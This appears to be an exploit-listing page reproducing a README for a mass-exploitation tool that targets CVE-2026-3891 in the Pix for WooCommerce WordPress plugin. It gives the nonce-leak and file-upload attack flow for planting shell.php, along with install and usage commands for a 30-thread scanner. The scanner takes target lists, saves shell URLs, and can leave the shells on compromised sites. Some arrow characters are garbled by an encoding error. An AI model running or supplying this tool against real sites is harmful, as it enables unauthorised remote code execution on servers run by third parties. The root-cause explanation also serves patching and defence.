Share
## https://sploitus.com/exploit?id=2B4D35BF-EB2C-5844-B141-F9A46BA1B88E
CVE-2026-3891 โ Pix for WooCommerce Unauthenticated File Upload RCE
Nonce Leak โ certificate_crt_path Upload โ Code Execution
---
## Overview
**CVE-2026-3891** is a critical-severity (CVSS 9.8) **unauthenticated** arbitrary file upload vulnerability in the **Pix for WooCommerce** WordPress plugin (by linknacional) versions **โค 1.5.0**.
The `lkn_pix_for_woocommerce_c6_save_settings` AJAX handler has:
1. **No capability check** โ any unauthenticated visitor can call it
2. **No file type validation** โ any file extension is accepted via the `certificate_crt_path` parameter
3. A valid nonce is **freely obtainable** via the `lkn_pix_for_woocommerce_generate_nonce` endpoint without authentication
Uploaded files land in the web-accessible directory `/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/`.
### Affected Versions
| Version | Status |
|---|---|
| โค 1.5.0 | Vulnerable |
| 1.6.0+ | Patched |
> **Discovered by:** Alexis Lafontaine via Wordfence (March 13, 2026)
---
## Vulnerability Mechanism
### Root Cause
```php
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);
// Upload handler โ no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
// No current_user_can() check
// No wp_check_filetype() call
move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}
```
### Attack Flow
```
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
โ Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
โ Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
โ RCE
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt
```
## Usage
```bash
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup
```
### Arguments
```
-t, --target Single target
-f, --file Target list
-o, --output Save RCE URLs
--threads Workers (default: 30)
--no-cleanup Leave shells on target
--debug Show every request
-v, --verbose Verbose output
```
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/payment-gateway-pix-for-woocommerce/pix-for-woocommerce-150-unauthenticated-arbitrary-file-upload) |
| NVD Entry | [CVE-2026-3891](https://nvd.nist.gov/vuln/detail/CVE-2026-3891) |
| Researcher | Alexis Lafontaine |
---
Not affiliated with linknacional or Pix for WooCommerce.